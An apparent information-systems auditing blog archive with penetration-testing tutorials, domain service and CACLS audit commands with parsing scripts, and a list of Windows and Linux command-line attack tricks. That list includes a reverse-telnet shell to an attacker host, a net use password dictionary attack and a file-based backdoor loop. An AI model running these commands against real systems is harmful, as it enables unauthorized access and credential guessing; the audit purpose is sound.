I created a tutorial on how to set up and configure the Nokia N810 Internet Tablet to conduct a wireless assessment or audit. The tutorial covers setting up kismet (oldcore and newcore), aircrack-ng (airbase and aircrack), and btscanner. I'm still working on developing steps to install Metasploit and Karmetasploit for wireless client attacks. The tutorial also details using the internal GPS as well as adding an external wireless adapter. The latest version of the tutorial can be found here.


I put together another Technical Assessment Plan, this one for assessing the SNMP protocol. It uses open source and freely downloadable utilities, and is aimed at auditors who do not have access to or cannot afford the Solarwinds toolset. This is version 0.1 of the document; I plan on making updates and adding new tools in the future.


I put together a Technical Assessment Plan that can be used to conduct external fingerprinting using the tools and utilities that a penetration tester would use. The assessment plans are structured to help with documenting evidence for inclusion in a work-paper process. Each plan provides information on how to install, configure, and use the tools to obtain the evidence needed for an engagement. The Technical Assessment Plans that I have created can be found here.


On a recent pentest I was able to use SQLNINJA to exploit a SQL Injection vulnerability I had identified. I documented the steps I took so that future auditors can take advantage of this tool. Check out the tutorial here.


During an audit I had to determine whether a particular remote control service was installed on the Domain workstations and servers. It was determined during the interview process that no remote control software was in use.  I decided to obtain the evidence to the contrary.  I had already compromised a Domain Administrator account so I had the appropriate permissions.

Get a list of servers and workstations.
C:\>net view /domain
C:\>net view /domain:<domain_name> >> host_list.txt

The host_list.txt will need to be edited, as the descriptions of the workstations and servers show up to the right of each host name. You can quickly edit it in Excel (Text to Columns). If this were Linux, or you had awk available, you could pipe the output through awk and keep only the first column (| awk '{print $1}').

The command we will use to query remote services is Service Control (sc) from the Windows Resource Kit. For more information on the command see this site.

C:\>for /f %i in (host_list.txt) do @echo %i >> results.txt && sc \\%i query <Service_Name>

In addition to the service results I would like to have the fully qualified domain name and IP address of the server or workstation I am querying. A quick addition of the nslookup command gives you this:

C:\>for /f %i in (host_list.txt) do @nslookup %i >> results.txt && sc \\%i query <Service_Name> >> results.txt

Finally, I would like to know, with reasonable assurance, the user of that workstation. For that we will use a command line tool from the PsTools kit called PsLoggedOn. Once that tool is installed on your auditor workstation/laptop you can add it to the command:

C:\>for /f %i in (host_list.txt) do @nslookup %i >> results.txt && sc \\%i query <Service_Name> >> results.txt && psloggedon -l -x \\%i >> results.txt

I wrote a quick script to parse the output of the above command so it can be sorted and analyzed in your preferred spreadsheet application.


#!/usr/bin/perl
# serviceparse.pl - turn results.txt (nslookup + sc query + psloggedon output)
# into one host,ip,service,user CSV row per host

$numArgs = $#ARGV + 1;
if($numArgs < 1){
  print "Invalid Number of Arguments\n";
  print "serviceparse.pl <filename>\n\n";
  exit;
}

#open the file
$infile = "$ARGV[0]";
open(DAT, $infile) || die("Something did not work.  You figure it out.");

#save file contents into an array
@raw_data = <DAT>;
close(DAT);

#Cycle through the entire array
for($count=0;$count<=$#raw_data;$count++){

  #get fully qualified domain name (the "Name:" line of the nslookup output)
  if($raw_data[$count] =~ /Name:/){
    @array = split(/:/, $raw_data[$count]);
    $host = $array[1];
    $host =~ s/^\s+//;
    $host =~ s/\s+$//;

    #get ip address (the "Address:" line that follows it)
    @array = split(/:/, $raw_data[$count+1]);
    $ip = $array[1];
    $ip =~ s/^\s+//;
    $ip =~ s/\s+$//;

    $service = "";
    $user = "";
    for($c=$count+1;$c<=$#raw_data;$c++){

      #"Server:" starts the next host's nslookup output, so this record is complete
      if($raw_data[$c] =~ /Server:/){last;}

      if($raw_data[$c] =~ /RUNNING/){
        $service = "Installed and Running";
      }
      if($raw_data[$c] =~ /STOPPED/){
        $service = "Installed and Stopped";
      }
      #sc errors: 1722 = RPC server unavailable, 1060 = service does not exist;
      #sc prints the explanatory message two lines below the error
      if($raw_data[$c] =~ /FAILED 1722/ || $raw_data[$c] =~ /FAILED 1060/){
        $service = $raw_data[$c+2];
        $service =~ s/^\s+//;
        $service =~ s/\s+$//;
      }

      #psloggedon output: take the user part of DOMAIN\user from the entry
      #three lines below the "Users logged on locally:" heading
      if($raw_data[$c] =~ /locally:/){
        @array = split(/\\/, $raw_data[$c+3]);
        $user = $array[1];
        $user =~ s/^\s+//;
        $user =~ s/\s+$//;
      }elsif($raw_data[$c] =~ /Error opening HKEY_USERS/){
        $user = "";
      }
    }
    #print the record (also for the last host, which has no "Server:" line after it)
    print "$host,$ip,$service,$user\n";
  }
}

Run this script from the command line and redirect its output to a file:

$ perl serviceparse.pl results.txt > parseresults.csv
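As an added example (not the post's own Perl script), here is a Python parser for the same results.txt that also records what each sc outcome means for the audit: error 1060 is evidence that the service is not installed, while 1722 (RPC server unavailable) only means the host could not be reached, so that row must not be read as "not installed". The sample output, host names, user and service name are constructed.

```python
import csv, sys

# Constructed, abridged results.txt for three hosts (blank lines dropped), in
# the shape nslookup, "sc \\host query" and "psloggedon -l -x" print them.
SAMPLE = """\
Server:  dns01.corp.example
Address:  10.0.0.53
Name:    ws01.corp.example
Address:  10.0.1.15
SERVICE_NAME: TermService
        STATE              : 4  RUNNING
Users logged on locally:
     CORP\\jdoe
Name:    ws02.corp.example
Address:  10.0.1.16
[SC] OpenService FAILED 1060:
The specified service does not exist as an installed service.
Name:    ws03.corp.example
Address:  10.0.1.17
[SC] OpenSCManager FAILED 1722:
The RPC server is unavailable.
Error opening HKEY_USERS for \\\\ws03
"""

# Audit meaning of sc's status/error lines: 1060 is evidence the service is
# absent; 1722 (RPC unavailable) only says the host could not be reached.
STATUS = {"RUNNING": "Installed and Running", "STOPPED": "Installed and Stopped",
          "FAILED 1060": "Not installed", "FAILED 1722": "Unreachable - inconclusive"}

def parse_results(text):
    """One dict per host: fqdn, ip, service conclusion, logged-on user."""
    rows, cur, lines = [], None, text.splitlines()
    for i, line in enumerate(lines):
        if line.startswith("Name:"):            # nslookup answer opens a host record
            cur = {"host": line.split(":", 1)[1].strip(), "ip": "",
                   "service": "No sc output", "user": ""}
            rows.append(cur)
        elif cur is None:                       # nslookup's own DNS-server header
            continue
        elif line.startswith("Address:") and not cur["ip"]:
            cur["ip"] = line.split(":", 1)[1].strip()
        elif line.startswith("Users logged on locally:"):  # principal is on the next line
            cur["user"] = lines[i + 1].strip() if i + 1 < len(lines) else ""
        else:                                   # sc status or error line
            cur["service"] = next((m for k, m in STATUS.items() if k in line), cur["service"])
    return rows

if __name__ == "__main__":                      # CSV for the spreadsheet
    table = [[r["host"], r["ip"], r["service"], r["user"]] for r in parse_results(SAMPLE)]
    csv.writer(sys.stdout).writerows([["host", "ip", "service", "user"]] + table)
```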


CACLS.exe is a great built-in Windows utility that lists the permissions on a file or folder. I have used this command in an audit to get the permissions of the folders on an agency file server that served the "private" shares to each Domain user. The finding we would be looking for when examining the results is improper access to the "private" shares by other Domain users.

For CACLS options and how to interpret the results see this site.

The commands that I run are as follows:

Directories and files in the folder you run CACLS from:
c:\>for /f "delims=" %a in ('dir /b') do @cacls "%a" >> savefile.txt

All directories, recursively, from the folder you run CACLS from:
c:\>for /f "delims=" %a in ('dir /b /S /A:D') do @cacls "%a" >> savefile.txt

Once the results are obtained they need to be parsed so they can be analyzed. I have written a Perl script that adds the correct folder name to each permission line, so the lines can be sorted by permission in your spreadsheet application of choice.


Save the code and run it as follows (also download here):


#!/usr/bin/perl
# caclsparse.pl - prefix every CACLS permission line with its folder name so
# the result can be sorted by permission in a spreadsheet

$numArgs = $#ARGV + 1;
if($numArgs < 2){
  print "Invalid Number of Arguments\n";
  print "caclsparse.pl <filename> <foldername>\n";
  print "The foldername is the root folder you ran CACLS.exe from.\n\n";
  print "foldername example:  \"C:\\\\Documents and Settings\\\\jedge\"\n";
  print "Folder names with spaces need to be encapsulated in quotes.\n";
  print "You need to escape the backslash twice.\n";
  exit;
}

#open the file
$infile = "$ARGV[0]";
open(DAT, $infile) || die("Something did not work.  You can email me at james.edge(at)jedge.com\n");

#save file contents into an array
@raw_data = <DAT>;
close(DAT);

open(OUTPUT, '>cacls_parse_output.csv');
#Cycle through the entire array
for($count=0;$count<=$#raw_data;$count++){

  #pull folder name, split it, and print it
  #the first record in each grouping is the only record with the folder name;
  #the permission lines below it are indented to the column where its ACE starts
  if($raw_data[$count] =~ /($ARGV[1])/){
    $x = 0;
    while(substr($raw_data[$count+1],$x,1) eq " "){
      $x++;
    }
    $folder = substr($raw_data[$count],0,$x-1);
    $permissions = substr($raw_data[$count],$x,length($raw_data[$count]) - $x);
    $permissions =~ s/^\s+//;
    $permissions =~ s/\s+$//;
    print OUTPUT "\"$folder\",\"$permissions\"\n";

    #cycle through the permissions listed below the folder name
    for($c=$count+1;$c<=$#raw_data;$c++){

      #print until you get to the next folder item
      if($raw_data[$c] =~ /($ARGV[1])/){last;}

      #clear all whitespace
      $permissions = substr($raw_data[$c],$x,length($raw_data[$c]) - $x);
      $permissions =~ s/^\s+//;
      $permissions =~ s/\s+$//;
      print OUTPUT "\"$folder\",\"$permissions\"\n";
    }
  }
}
close(OUTPUT);

$ perl caclsparse.pl savefile.txt "C:\\Documents and Settings\\jedge"

NOTE: I run it from Linux, but ActivePerl for Windows will work as well. Installing Perl is outside the scope of this posting.

Open cacls_parse_output.csv in Excel/OO Calc/Gnumeric and begin analyzing the results!
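As an added example, not the post's script, the Python below parses the same cacls output and goes one step further by flagging the finding described above: any ACE on a user's private folder that is neither the folder's owner (assumed to be the domain account named after the folder) nor on a short allow list of principals expected on every folder. The domain name CORP, the folder names and the ACLs are constructed.

```python
# Constructed cacls output for the folders under D:\Private, as the
# "for /f ... ('dir /b /S /A:D')" loop above would save it (names made up).
SAMPLE = r"""D:\Private\jdoe CORP\jdoe:(OI)(CI)F
                BUILTIN\Administrators:(OI)(CI)F
                NT AUTHORITY\SYSTEM:(OI)(CI)F
D:\Private\asmith CORP\asmith:(OI)(CI)F
                  CORP\jdoe:(OI)(CI)R
                  BUILTIN\Administrators:(OI)(CI)F
D:\Private\bwong CORP\Domain Users:(OI)(CI)C
                 CORP\bwong:(OI)(CI)F
"""

DOMAIN = "CORP"   # assumed NetBIOS domain of the users who own the private folders
# Principals that may legitimately appear on every private folder.
ALLOWED = {"BUILTIN\\Administrators", "NT AUTHORITY\\SYSTEM", "CREATOR OWNER"}

def parse_cacls(text):
    """Group cacls output into {folder: [(principal, rights), ...]}."""
    folders, lines, i = {}, [l for l in text.splitlines() if l.strip()], 0
    while i < len(lines):
        first, aces, i = lines[i], [], i + 1
        while i < len(lines) and lines[i].startswith(" "):  # continuation ACEs
            aces.append(lines[i]); i += 1
        if aces:   # they are indented to the column where the first line's ACE starts
            col = len(aces[0]) - len(aces[0].lstrip(" "))
            folder, aces = first[:col - 1], [first[col:]] + aces
        else:      # lone ACE: assume its principal has no space (unlike NT AUTHORITY\...)
            folder, ace = first.rsplit(" ", 1)
            aces = [ace]
        folders[folder] = [tuple(a.strip().split(":", 1)) for a in aces]
    return folders

def improper_access(folders, domain=DOMAIN, allowed=ALLOWED):
    """The finding: ACEs that grant anyone other than the owner (the domain account
    named after the folder) or an allowed principal access to a private folder."""
    findings = []
    for folder, aces in folders.items():
        owner = domain + "\\" + folder.rsplit("\\", 1)[-1]
        for principal, rights in aces:
            if principal not in allowed and principal.lower() != owner.lower():
                findings.append((folder, principal, rights))
    return findings

if __name__ == "__main__":
    for folder, principal, rights in improper_access(parse_cacls(SAMPLE)):
        print(f"{folder}: {principal} has {rights}")
```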


Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans). I highly recommend listening to these webcasts and downloading the slides for your reference. I'm including the commands extracted from the slides that can be very useful on a penetration test.

Ninjitsu I

Ping Sweep
C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

Ninjitsu II

Linux Command-Line Port Scanner
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]

Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Ninjitsu III

Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface "wireless network connection" disable & ping -n 3 127.0.0.1 >nul & netsh interface set interface "wireless network connection" enable & ping -n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)

Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"

Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"

Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WAS-WindowsActivationService;WAS-ProcessModel;WAS-NetFxEnvironment;WAS-ConfigurationAPI

List Domain Password Settings
C:\>net accounts /domain

© 2012 Information Systems Auditing. Suffusion theme by Sayontan Sinha.